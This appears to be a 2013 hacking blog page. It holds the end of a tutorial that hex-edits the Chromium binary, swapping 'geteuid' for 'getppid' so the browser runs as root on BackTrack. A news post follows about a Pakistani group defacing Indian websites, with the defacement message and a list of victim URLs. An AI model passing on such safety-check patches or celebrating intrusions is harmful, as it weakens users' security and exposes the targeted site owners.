root@bt:/usr/lib/chromium-browser# hexedit chromium-browser
something like this will be popup on the terminal
Don't worry now we just need to change the value of a specific id. :D
4) Now the most important step Press the tab button and then ctrl+s to be in the search mode then type "geteuid" and replace it with "getppid" and don't hit enter -_- press ctrl+x and it will prompt you to save changes or not just press "Y"
Voila now open the Chromium and check if it's opening or not :D
Enjoy your Chrome browser on Backtrack :D
Don't forget to comment or giving us your feedback if you have any problem regarding the tut just drop a comment below.
Thank you.
Wednesday, 8 May 2013
Labels:
Cyber News
The attacker's namely x33k A.K.A v1ruX 4u AND X3R03x who attack the websites mentioned the following reason :
Read More
India On PCE Mercy.
Recently a Pakistani hacker's team namely Pak Cyber Experts attack indian website's the real reason behind those hacks are mentioned by attacker's.
The attacker's namely x33k A.K.A v1ruX 4u AND X3R03x who attack the websites mentioned the following reason :
MESSAGE :
"=====================================================================
x33k & X3R03X Has Arrived You Just Got Hacked Patch Your Asses, Don't Know How To Secure Shits And Making Sites LOL, Huh ! Now Next Time Keep Eye On Your cPanel | Domain | Your Admin Panel Becuase We Can Get In Again, Take Care
===================================================================================="
The websites which was hacked contains,
1) http://47webstudio.com/ 2) http://www.brandvois.com/ 3) http://cheatedon.me/ 4) http://www.codyscopywriters.com/ 5) http://dvonn.com/ 6) http://kindlecrush.com/ 7) http://n-frames.com/ 8) http://sandeepgr.tk/ 9) http://www.thewings.co/
10) http://tonyvarghese.com/
11) http://intire.in/
You can find the mirror's on Hack-db.
Subscribe to:
Posts
(
Atom
)
